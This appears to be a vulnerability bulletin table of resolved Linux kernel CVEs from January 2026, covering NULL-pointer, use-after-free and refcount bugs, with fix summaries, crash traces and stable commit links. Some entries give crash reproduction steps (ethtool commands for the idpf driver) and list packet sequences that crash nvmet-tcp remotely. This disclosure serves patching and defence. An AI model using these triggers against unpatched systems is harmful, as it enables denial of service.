| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: mscc: ocelot: Fix crash when adding interface under a lag Commit 15faa1f67ab4 ("lan966x: Fix crash when adding interface under a lag") fixed a similar issue in the lan966x driver caused by a NULL pointer dereference. The ocelot_set_aggr_pgids() function in the ocelot driver has similar logic and is susceptible to the same crash. This issue specifically affects the ocelot_vsc7514.c frontend, which leaves unused ports as NULL pointers. The felix_vsc9959.c frontend is unaffected as it uses the DSA framework which registers all ports. Fix this by checking if the port pointer is valid before accessing it. | 2026-01-23 | not yet calculated | CVE-2026-22982 | https://git.kernel.org/stable/c/8767f238b0e6c3d0b295ac6dce9fbe6a99bd1b9d https://git.kernel.org/stable/c/b17818307446c5a8d925a39a792261dbfa930041 https://git.kernel.org/stable/c/2985712dc76dfa670eb7fd607c09d4d48e5f5c6e https://git.kernel.org/stable/c/03fb1708b7d1e76aecebf767ad059c319845039f https://git.kernel.org/stable/c/f490af47bbee02441e356a1e0b86e3b3dd5120ff https://git.kernel.org/stable/c/34f3ff52cb9fa7dbf04f5c734fcc4cb6ed5d1a95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: do not write to msg_get_inq in callee NULL pointer dereference fix. msg_get_inq is an input field from caller to callee. Don't set it in the callee, as the caller may not clear it on struct reuse. This is a kernel-internal variant of msghdr only, and the only user does reinitialize the field. So this is not critical for that reason. But it is more robust to avoid the write, and slightly simpler code. And it fixes a bug, see below. Callers set msg_get_inq to request the input queue length to be returned in msg_inq. This is equivalent to but independent from the SO_INQ request to return that same info as a cmsg (tp->recvmsg_inq). To reduce branching in the hot path the second also sets the msg_inq. That is WAI. This is a fix to commit 4d1442979e4a ("af_unix: don't post cmsg for SO_INQ unless explicitly asked for"), which fixed the inverse. Also avoid NULL pointer dereference in unix_stream_read_generic if state->msg is NULL and msg->msg_get_inq is written. A NULL state->msg can happen when splicing as of commit 2b514574f7e8 ("net: af_unix: implement splice for stream af_unix sockets"). Also collapse two branches using a bitwise or. | 2026-01-23 | not yet calculated | CVE-2026-22983 | https://git.kernel.org/stable/c/ffa2be496ef65055b28b39c6bd9a7d66943ee89a https://git.kernel.org/stable/c/7d11e047eda5f98514ae62507065ac961981c025 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds reads in handle_auth_done() Perform an explicit bounds check on payload_len to avoid a possible out-of-bounds access in the callout. [ idryomov: changelog ] | 2026-01-23 | not yet calculated | CVE-2026-22984 | https://git.kernel.org/stable/c/194cfe2af4d2a1de599d39dad636b47c2f6c2c96 https://git.kernel.org/stable/c/79fe3511db416d2f2edcfd93569807cb02736e5e https://git.kernel.org/stable/c/ef208ea331ef688729f64089b895ed1b49e842e3 https://git.kernel.org/stable/c/2802ef3380fa8c4a08cda51ec1f085b1a712e9e2 https://git.kernel.org/stable/c/2d653bb63d598ae4b096dd678744bdcc34ee89e8 https://git.kernel.org/stable/c/818156caffbf55cb4d368f9c3cac64e458fb49c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations The RSS LUT is not initialized until the interface comes up, causing the following NULL pointer crash when ethtool operations like rxhash on/off are performed before the interface is brought up for the first time. Move RSS LUT initialization from ndo_open to vport creation to ensure LUT is always available. This enables RSS configuration via ethtool before bringing the interface up. Simplify LUT management by maintaining all changes in the driver's soft copy and programming zeros to the indirection table when rxhash is disabled. Defer HW programming until the interface comes up if it is down during rxhash and LUT configuration changes. Steps to reproduce: ** Load idpf driver; interfaces will be created modprobe idpf ** Before bringing the interfaces up, turn rxhash off ethtool -K eth2 rxhash off [89408.371875] BUG: kernel NULL pointer dereference, address: 0000000000000000 [89408.371908] #PF: supervisor read access in kernel mode [89408.371924] #PF: error_code(0x0000) - not-present page [89408.371940] PGD 0 P4D 0 [89408.371953] Oops: Oops: 0000 [#1] SMP NOPTI <snip> [89408.372052] RIP: 0010:memcpy_orig+0x16/0x130 [89408.372310] Call Trace: [89408.372317] <TASK> [89408.372326] ? idpf_set_features+0xfc/0x180 [idpf] [89408.372363] __netdev_update_features+0x295/0xde0 [89408.372384] ethnl_set_features+0x15e/0x460 [89408.372406] genl_family_rcv_msg_doit+0x11f/0x180 [89408.372429] genl_rcv_msg+0x1ad/0x2b0 [89408.372446] ? __pfx_ethnl_set_features+0x10/0x10 [89408.372465] ? __pfx_genl_rcv_msg+0x10/0x10 [89408.372482] netlink_rcv_skb+0x58/0x100 [89408.372502] genl_rcv+0x2c/0x50 [89408.372516] netlink_unicast+0x289/0x3e0 [89408.372533] netlink_sendmsg+0x215/0x440 [89408.372551] __sys_sendto+0x234/0x240 [89408.372571] __x64_sys_sendto+0x28/0x30 [89408.372585] x64_sys_call+0x1909/0x1da0 [89408.372604] do_syscall_64+0x7a/0xfa0 [89408.373140] ? clear_bhb_loop+0x60/0xb0 [89408.373647] entry_SYSCALL_64_after_hwframe+0x76/0x7e [89408.378887] </TASK> <snip> | 2026-01-23 | not yet calculated | CVE-2026-22985 | https://git.kernel.org/stable/c/b29a5a7dd1f4293ee49c469938c25bf85a5aa802 https://git.kernel.org/stable/c/83f38f210b85676f40ba8586b5a8edae19b56995 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpiolib: fix race condition for gdev->srcu If two drivers were calling gpiochip_add_data_with_key(), one may be traversing the srcu-protected list in gpio_name_to_desc(), meanwhile other has just added its gdev in gpiodev_add_to_list_unlocked(). This creates a non-mutexed and non-protected timeframe, when one instance is dereferencing and using &gdev->srcu, before the other has initialized it, resulting in crash: [ 4.935481] Unable to handle kernel paging request at virtual address ffff800272bcc000 [ 4.943396] Mem abort info: [ 4.943400] ESR = 0x0000000096000005 [ 4.943403] EC = 0x25: DABT (current EL), IL = 32 bits [ 4.943407] SET = 0, FnV = 0 [ 4.943410] EA = 0, S1PTW = 0 [ 4.943413] FSC = 0x05: level 1 translation fault [ 4.943416] Data abort info: [ 4.943418] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000 [ 4.946220] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 4.955261] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 4.955268] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000038e6c000 [ 4.961449] [ffff800272bcc000] pgd=0000000000000000 [ 4.969203] , p4d=1000000039739003 [ 4.979730] , pud=0000000000000000 [ 4.980210] phandle (CPU): 0x0000005e, phandle (BE): 0x5e000000 for node "reset" [ 4.991736] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP ... [ 5.121359] pc : __srcu_read_lock+0x44/0x98 [ 5.131091] lr : gpio_name_to_desc+0x60/0x1a0 [ 5.153671] sp : ffff8000833bb430 [ 5.298440] [ 5.298443] Call trace: [ 5.298445] __srcu_read_lock+0x44/0x98 [ 5.309484] gpio_name_to_desc+0x60/0x1a0 [ 5.320692] gpiochip_add_data_with_key+0x488/0xf00 5.946419] ---[ end trace 0000000000000000 ]--- Move initialization code for gdev fields before it is added to gpio_devices, with adjacent initialization code. Adjust goto statements to reflect modified order of operations [Bartosz: fixed a build issue, removed stray newline] | 2026-01-23 | not yet calculated | CVE-2026-22986 | https://git.kernel.org/stable/c/fb674c8f1a5d8dd3113a7326030f963fa2d79c02 https://git.kernel.org/stable/c/a7ac22d53d0990152b108c3f4fe30df45fcb0181 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_api: avoid dereferencing ERR_PTR in tcf_idrinfo_destroy syzbot reported a crash in tc_act_in_hw() during netns teardown where tcf_idrinfo_destroy() passed an ERR_PTR(-EBUSY) value as a tc_action pointer, leading to an invalid dereference. Guard against ERR_PTR entries when iterating the action IDR so teardown does not call tc_act_in_hw() on an error pointer. | 2026-01-23 | not yet calculated | CVE-2026-22987 | https://git.kernel.org/stable/c/67550a1130b647bb0d093c9c0a810c69aa6a30a8 https://git.kernel.org/stable/c/adb25a46dc0a43173f5ea5f5f58fc8ba28970c7c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arp: do not assume dev_hard_header() does not change skb->head arp_create() is the only dev_hard_header() caller making assumption about skb->head being unchanged. A recent commit broke this assumption. Initialize @arp pointer after dev_hard_header() call. | 2026-01-23 | not yet calculated | CVE-2026-22988 | https://git.kernel.org/stable/c/e432dbff342b95fe44645f9a90fcf333c80f4b5e https://git.kernel.org/stable/c/393525dee5c39acff8d6705275d7fcaabcfb7f0a https://git.kernel.org/stable/c/70bddc16491ef4681f3569b3a2c80309a3edcdd1 https://git.kernel.org/stable/c/029935507d0af6553c45380fbf6feecf756fd226 https://git.kernel.org/stable/c/dd6ccec088adff4bdf33e2b2dd102df20a7128fa https://git.kernel.org/stable/c/949647e7771a4a01963fe953a96d81fba7acecf3 https://git.kernel.org/stable/c/c92510f5e3f82ba11c95991824a41e59a9c5ed81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: check that server is running in unlock_filesystem If we are trying to unlock the filesystem via an administrative interface and nfsd isn't running, it crashes the server. This happens currently because nfsd4_revoke_states() access state structures (eg., conf_id_hashtbl) that has been freed as a part of the server shutdown. [ 59.465072] Call trace: [ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P) [ 59.465830] write_unlock_fs+0x258/0x440 [nfsd] [ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd] [ 59.466780] vfs_write+0x1f0/0x938 [ 59.467088] ksys_write+0xfc/0x1f8 [ 59.467395] __arm64_sys_write+0x74/0xb8 [ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8 [ 59.468177] do_el0_svc+0x154/0x1d8 [ 59.468489] el0_svc+0x40/0xe0 [ 59.468767] el0t_64_sync_handler+0xa0/0xe8 [ 59.469138] el0t_64_sync+0x1ac/0x1b0 Ensure this can't happen by taking the nfsd_mutex and checking that the server is still up, and then holding the mutex across the call to nfsd4_revoke_states(). | 2026-01-23 | not yet calculated | CVE-2026-22989 | https://git.kernel.org/stable/c/d95499900fe52f3d461ed26b7a30bebea8f12914 https://git.kernel.org/stable/c/e06c9f6c0f554148d4921c2a15bd054260a054ac https://git.kernel.org/stable/c/d0424066fcd294977f310964bed6f2a487fa4515 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() If the osdmap is (maliciously) corrupted such that the incremental osdmap epoch is different from what is expected, there is no need to BUG. Instead, just declare the incremental osdmap to be invalid. | 2026-01-23 | not yet calculated | CVE-2026-22990 | https://git.kernel.org/stable/c/9aa0b0c14cefece078286d78b97d4c09685e372d https://git.kernel.org/stable/c/4b106fbb1c7b841cd402abd83eb2447164c799ea https://git.kernel.org/stable/c/6afd2a4213524bc742b709599a3663aeaf77193c https://git.kernel.org/stable/c/d3613770e2677683e65d062da5e31f48c409abe9 https://git.kernel.org/stable/c/6c6cec3db3b418c4fdf815731bc39e46dff75e1b https://git.kernel.org/stable/c/6348d70af847b79805374fe628d3809a63fd7df3 https://git.kernel.org/stable/c/e00c3f71b5cf75681dbd74ee3f982a99cb690c2b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: make free_choose_arg_map() resilient to partial allocation free_choose_arg_map() may dereference a NULL pointer if its caller fails after a partial allocation. For example, in decode_choose_args(), if allocation of arg_map->args fails, execution jumps to the fail label and free_choose_arg_map() is called. Since arg_map->size is updated to a non-zero value before memory allocation, free_choose_arg_map() will iterate over arg_map->args and dereference a NULL pointer. To prevent this potential NULL pointer dereference and make free_choose_arg_map() more resilient, add checks for pointers before iterating. | 2026-01-23 | not yet calculated | CVE-2026-22991 | https://git.kernel.org/stable/c/9b3730dabcf3764bfe3ff07caf55e641a0b45234 https://git.kernel.org/stable/c/851241d3f78a5505224dc21c03d8692f530256b4 https://git.kernel.org/stable/c/ec1850f663da64842614c86b20fe734be070c2ba https://git.kernel.org/stable/c/8081faaf089db5280c3be820948469f7c58ef8dd https://git.kernel.org/stable/c/c4c2152a858c0ce4d2bff6ca8c1d5b0ef9f2cbdf https://git.kernel.org/stable/c/f21c3fdb96833aac2f533506899fe38c19cf49d5 https://git.kernel.org/stable/c/e3fe30e57649c551757a02e1cad073c47e1e075e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: return the handler error from mon_handle_auth_done() Currently any error from ceph_auth_handle_reply_done() is propagated via finish_auth() but isn't returned from mon_handle_auth_done(). This results in higher layers learning that (despite the monitor considering us to be successfully authenticated) something went wrong in the authentication phase and reacting accordingly, but msgr2 still trying to proceed with establishing the session in the background. In the case of secure mode this can trigger a WARN in setup_crypto() and later lead to a NULL pointer dereference inside of prepare_auth_signature(). | 2026-01-23 | not yet calculated | CVE-2026-22992 | https://git.kernel.org/stable/c/77229551f2cf72f3e35636db68e6a825b912cf16 https://git.kernel.org/stable/c/33908769248b38a5e77cf9292817bb28e641992d https://git.kernel.org/stable/c/e097cd858196b1914309e7e3d79b4fa79383754d https://git.kernel.org/stable/c/d2c4a5f6996683f287f3851ef5412797042de7f1 https://git.kernel.org/stable/c/9e0101e57534ef0e7578dd09608a6106736b82e5 https://git.kernel.org/stable/c/e84b48d31b5008932c0a0902982809fbaa1d3b70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: Fix RSS LUT NULL ptr issue after soft reset During soft reset, the RSS LUT is freed and not restored unless the interface is up. If an ethtool command that accesses the rss lut is attempted immediately after reset, it will result in NULL ptr dereference. Also, there is no need to reset the rss lut if the soft reset does not involve queue count change. After soft reset, set the RSS LUT to default values based on the updated queue count only if the reset was a result of a queue count change and the LUT was not configured by the user. In all other cases, don't touch the LUT. Steps to reproduce: ** Bring the interface down (if up) ifconfig eth1 down ** update the queue count (eg., 27->20) ethtool -L eth1 combined 20 ** display the RSS LUT ethtool -x eth1 [82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000 [82375.558373] #PF: supervisor read access in kernel mode [82375.558391] #PF: error_code(0x0000) - not-present page [82375.558408] PGD 0 P4D 0 [82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI <snip> [82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf] [82375.558786] Call Trace: [82375.558793] <TASK> [82375.558804] rss_prepare.isra.0+0x187/0x2a0 [82375.558827] rss_prepare_data+0x3a/0x50 [82375.558845] ethnl_default_doit+0x13d/0x3e0 [82375.558863] genl_family_rcv_msg_doit+0x11f/0x180 [82375.558886] genl_rcv_msg+0x1ad/0x2b0 [82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10 [82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10 [82375.558937] netlink_rcv_skb+0x58/0x100 [82375.558957] genl_rcv+0x2c/0x50 [82375.558971] netlink_unicast+0x289/0x3e0 [82375.558988] netlink_sendmsg+0x215/0x440 [82375.559005] __sys_sendto+0x234/0x240 [82375.559555] __x64_sys_sendto+0x28/0x30 [82375.560068] x64_sys_call+0x1909/0x1da0 [82375.560576] do_syscall_64+0x7a/0xfa0 [82375.561076] ? clear_bhb_loop+0x60/0xb0 [82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e <snip> | 2026-01-23 | not yet calculated | CVE-2026-22993 | https://git.kernel.org/stable/c/ab92fa4dd81beaaed4e93a851f7a37c9b2d9776f https://git.kernel.org/stable/c/ebecca5b093895da801b3eba1a55b4ec4027d196 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix reference count leak in bpf_prog_test_run_xdp() syzbot is reporting unregister_netdevice: waiting for sit0 to become free. Usage count = 2 problem. A debug printk() patch found that a refcount is obtained at xdp_convert_md_to_buff() from bpf_prog_test_run_xdp(). According to commit ec94670fcb3b ("bpf: Support specifying ingress via xdp_md context in BPF_PROG_TEST_RUN"), the refcount obtained by xdp_convert_md_to_buff() will be released by xdp_convert_buff_to_md(). Therefore, we can consider that the error handling path introduced by commit 1c1949982524 ("bpf: introduce frags support to bpf_prog_test_run_xdp()") forgot to call xdp_convert_buff_to_md(). | 2026-01-23 | not yet calculated | CVE-2026-22994 | https://git.kernel.org/stable/c/368569bc546d3368ee9980ba79fc42fdff9a3365 https://git.kernel.org/stable/c/98676ee71fd4eafeb8be63c7f3f1905d40e03101 https://git.kernel.org/stable/c/fb9ef40cccdbacce36029b305d0ef1e12e4fea38 https://git.kernel.org/stable/c/737be05a765761d7d7c9f7fe92274bd8e6f6951e https://git.kernel.org/stable/c/ec69daabe45256f98ac86c651b8ad1b2574489a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ublk: fix use-after-free in ublk_partition_scan_work A race condition exists between the async partition scan work and device teardown that can lead to a use-after-free of ub->ub_disk: 1. ublk_ctrl_start_dev() schedules partition_scan_work after add_disk() 2. ublk_stop_dev() calls ublk_stop_dev_unlocked() which does: - del_gendisk(ub->ub_disk) - ublk_detach_disk() sets ub->ub_disk = NULL - put_disk() which may free the disk 3. The worker ublk_partition_scan_work() then dereferences ub->ub_disk leading to UAF Fix this by using ublk_get_disk()/ublk_put_disk() in the worker to hold a reference to the disk during the partition scan. The spinlock in ublk_get_disk() synchronizes with ublk_detach_disk() ensuring the worker either gets a valid reference or sees NULL and exits early. Also change flush_work() to cancel_work_sync() to avoid running the partition scan work unnecessarily when the disk is already detached. | 2026-01-23 | not yet calculated | CVE-2026-22995 | https://git.kernel.org/stable/c/72e28774e9644c2bdbb4920842fbf77103a15a85 https://git.kernel.org/stable/c/f0d385f6689f37a2828c686fb279121df006b4cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv mlx5e_priv is an unstable structure that can be memset(0) if profile attaching fails, mlx5e_priv in mlx5e_dev devlink private is used to reference the netdev and mdev associated with that struct. Instead, store netdev directly into mlx5e_dev and get mdev from the containing mlx5_adev aux device structure. This fixes a kernel oops in mlx5e_remove when switchdev mode fails due to change profile failure. $ devlink dev eswitch set pci/0000:00:03.0 mode switchdev Error: mlx5_core: Failed setting eswitch to offloads. dmesg: workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12 workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12 $ devlink dev reload pci/0000:00:03.0 ==> oops BUG: kernel NULL pointer dereference, address: 0000000000000520 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:mlx5e_remove+0x68/0x130 RSP: 0018:ffffc900034838f0 EFLAGS: 00010246 RAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45 RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000 RBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10 R10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0 R13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400 FS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0 Call Trace: <TASK> device_release_driver_internal+0x19c/0x200 bus_remove_device+0xc6/0x130 device_del+0x160/0x3d0 ? devl_param_driverinit_value_get+0x2d/0x90 mlx5_detach_device+0x89/0xe0 mlx5_unload_one_devl_locked+0x3a/0x70 mlx5_devlink_reload_down+0xc8/0x220 devlink_reload+0x7d/0x260 devlink_nl_reload_doit+0x45b/0x5a0 genl_family_rcv_msg_doit+0xe8/0x140 | 2026-01-25 | not yet calculated | CVE-2026-22996 | https://git.kernel.org/stable/c/dcb2ad755a16cb0ecd2dc98234d71a6e216ae7fe https://git.kernel.org/stable/c/a3d4f87d41f5140f1cf5c02fce5cdad2637f6244 https://git.kernel.org/stable/c/123eda2e5b1638e298e3a66bb1e64a8da92de5e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts Since j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is called only when the timer is enabled, we need to call j1939_session_deactivate_activate_next() if we cancelled the timer. Otherwise, refcount for j1939_session leaks, which will later appear as \| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2. problem. | 2026-01-25 | not yet calculated | CVE-2026-22997 | https://git.kernel.org/stable/c/cb2a610867bc379988bae0bb4b8bbc59c0decf1a https://git.kernel.org/stable/c/6121b7564c725b632ffe4764abe85aa239d37703 https://git.kernel.org/stable/c/1809c82aa073a11b7d335ae932d81ce51a588a4a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec Commit efa56305908b ("nvmet-tcp: Fix a kernel panic when host sends an invalid H2C PDU length") added ttag bounds checking and data_offset validation in nvmet_tcp_handle_h2c_data_pdu(), but it did not validate whether the command's data structures (cmd->req.sg and cmd->iov) have been properly initialized before processing H2C_DATA PDUs. The nvmet_tcp_build_pdu_iovec() function dereferences these pointers without NULL checks. This can be triggered by sending H2C_DATA PDU immediately after the ICREQ/ICRESP handshake, before sending a CONNECT command or NVMe write command. Attack vectors that trigger NULL pointer dereferences: 1. H2C_DATA PDU sent before CONNECT → both pointers NULL 2. H2C_DATA PDU for READ command → cmd->req.sg allocated, cmd->iov NULL 3. H2C_DATA PDU for uninitialized command slot → both pointers NULL The fix validates both cmd->req.sg and cmd->iov before calling nvmet_tcp_build_pdu_iovec(). Both checks are required because: - Uninitialized commands: both NULL - READ commands: cmd->req.sg allocated, cmd->iov NULL - WRITE commands: both allocated | 2026-01-25 | not yet calculated | CVE-2026-22998 | https://git.kernel.org/stable/c/3def5243150716be86599c2a1767c29c68838b6d https://git.kernel.org/stable/c/374b095e265fa27465f34780e0eb162ff1bef913 https://git.kernel.org/stable/c/32b63acd78f577b332d976aa06b56e70d054cbba |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: do not free existing class in qfq_change_class() Fixes qfq_change_class() error case. cl->qdisc and cl should only be freed if a new class and qdisc were allocated, or we risk various UAF. | 2026-01-25 | not yet calculated | CVE-2026-22999 | https://git.kernel.org/stable/c/362e269bb03f7076ba9990e518aeddb898232e50 https://git.kernel.org/stable/c/e9d8f11652fa08c647bf7bba7dd8163241a332cd https://git.kernel.org/stable/c/3879cffd9d07aa0377c4b8835c4f64b4fb24ac78 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Fix crash on profile change rollback failure mlx5e_netdev_change_profile can fail to attach a new profile and can fail to rollback to old profile, in such case, we could end up with a dangling netdev with a fully reset netdev_priv. A retry to change profile, e.g. another attempt to call mlx5e_netdev_change_profile via switchdev mode change, will crash trying to access the now NULL priv->mdev. This fix allows mlx5e_netdev_change_profile() to handle previous failures and an empty priv, by not assuming priv is valid. Pass netdev and mdev to all flows requiring mlx5e_netdev_change_profile() and avoid passing priv. In mlx5e_netdev_change_profile() check if current priv is valid, and if not, just attach the new profile without trying to access the old one. This fixes the following oops, when enabling switchdev mode for the 2nd time after first time failure: ## Enabling switchdev mode first time: mlx5_core 0012:03:00.1: E-Switch: Supported tc chains and prios offload workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12 workqueue: Failed to create a rescuer kthread for wq "mlx5e": -EINTR mlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12 mlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12 ^^^^^^^^ mlx5_core 0000:00:03.0: E-Switch: Disable: mode(LEGACY), nvfs(0), necvfs(0), active vports(0) ## retry: Enabling switchdev mode 2nd time: mlx5_core 0000:00:03.0: E-Switch: Supported tc chains and prios offload BUG: kernel NULL pointer dereference, address: 0000000000000038 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 13 UID: 0 PID: 520 Comm: devlink Not tainted 6.18.0-rc4+ #91 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014 RIP: 0010:mlx5e_detach_netdev+0x3c/0x90 Code: 50 00 00 f0 80 4f 78 02 48 8b bf e8 07 00 00 48 85 ff 74 16 48 8b 73 78 48 d1 ee 83 e6 01 83 f6 01 40 0f b6 f6 e8 c4 42 00 00 <48> 8b 45 38 48 85 c0 74 08 48 89 df e8 cc 47 40 1e 48 8b bb f0 07 RSP: 0018:ffffc90000673890 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff8881036a89c0 RCX: 0000000000000000 RDX: ffff888113f63800 RSI: ffffffff822fe720 RDI: 0000000000000000 RBP: 0000000000000000 R08: 0000000000002dcd R09: 0000000000000000 R10: ffffc900006738e8 R11: 00000000ffffffff R12: 0000000000000000 R13: 0000000000000000 R14: ffff8881036a89c0 R15: 0000000000000000 FS: 00007fdfb8384740(0000) GS:ffff88856a9d6000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000038 CR3: 0000000112ae0005 CR4: 0000000000370ef0 Call Trace: <TASK> mlx5e_netdev_change_profile+0x45/0xb0 mlx5e_vport_rep_load+0x27b/0x2d0 mlx5_esw_offloads_rep_load+0x72/0xf0 esw_offloads_enable+0x5d0/0x970 mlx5_eswitch_enable_locked+0x349/0x430 ? is_mp_supported+0x57/0xb0 mlx5_devlink_eswitch_mode_set+0x26b/0x430 devlink_nl_eswitch_set_doit+0x6f/0xf0 genl_family_rcv_msg_doit+0xe8/0x140 genl_rcv_msg+0x18b/0x290 ? __pfx_devlink_nl_pre_doit+0x10/0x10 ? __pfx_devlink_nl_eswitch_set_doit+0x10/0x10 ? __pfx_devlink_nl_post_doit+0x10/0x10 ? __pfx_genl_rcv_msg+0x10/0x10 netlink_rcv_skb+0x52/0x100 genl_rcv+0x28/0x40 netlink_unicast+0x282/0x3e0 ? __alloc_skb+0xd6/0x190 netlink_sendmsg+0x1f7/0x430 __sys_sendto+0x213/0x220 ? __sys_recvmsg+0x6a/0xd0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e RIP: 0033:0x7fdfb8495047 | 2026-01-25 | not yet calculated | CVE-2026-23000 | https://git.kernel.org/stable/c/dad52950b409d6923880d65a4cddb383286e17d2 https://git.kernel.org/stable/c/e05b8084a20f6bd5827d338c928e5e0fcbafa496 https://git.kernel.org/stable/c/4dadc4077e3f77d6d31e199a925fc7a705e7adeb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: macvlan: fix possible UAF in macvlan_forward_source() Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing. Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)). https://lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u | 2026-01-25 | not yet calculated | CVE-2026-23001 | https://git.kernel.org/stable/c/8518712a2ca952d6da2238c6f0a16b4ae5ea3f13 https://git.kernel.org/stable/c/6dbead9c7677186f22b7981dd085a0feec1f038e https://git.kernel.org/stable/c/7470a7a63dc162f07c26dbf960e41ee1e248d80e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/buildid: use __kernel_read() for sleepable context Prevent a "BUG: unable to handle kernel NULL pointer dereference in filemap_read_folio". For the sleepable context, convert freader to use __kernel_read() instead of direct page cache access via read_cache_folio(). This simplifies the faultable code path by using the standard kernel file reading interface which handles all the complexity of reading file data. At the moment we are not changing the code for non-sleepable context which uses filemap_get_folio() and only succeeds if the target folios are already in memory and up-to-date. The reason is to keep the patch simple and easier to backport to stable kernels. Syzbot repro does not crash the kernel anymore and the selftests run successfully. In the follow up we will make __kernel_read() with IOCB_NOWAIT work for non-sleepable contexts. In addition, I would like to replace the secretmem check with a more generic approach and will add fstest for the buildid code. | 2026-01-25 | not yet calculated | CVE-2026-23002 | https://git.kernel.org/stable/c/b11dfb7708f212b96c7973a474014c071aa02e05 https://git.kernel.org/stable/c/568aeb3476c770a3863c755dd2a199c212434286 https://git.kernel.org/stable/c/777a8560fd29738350c5094d4166fe5499452409 |
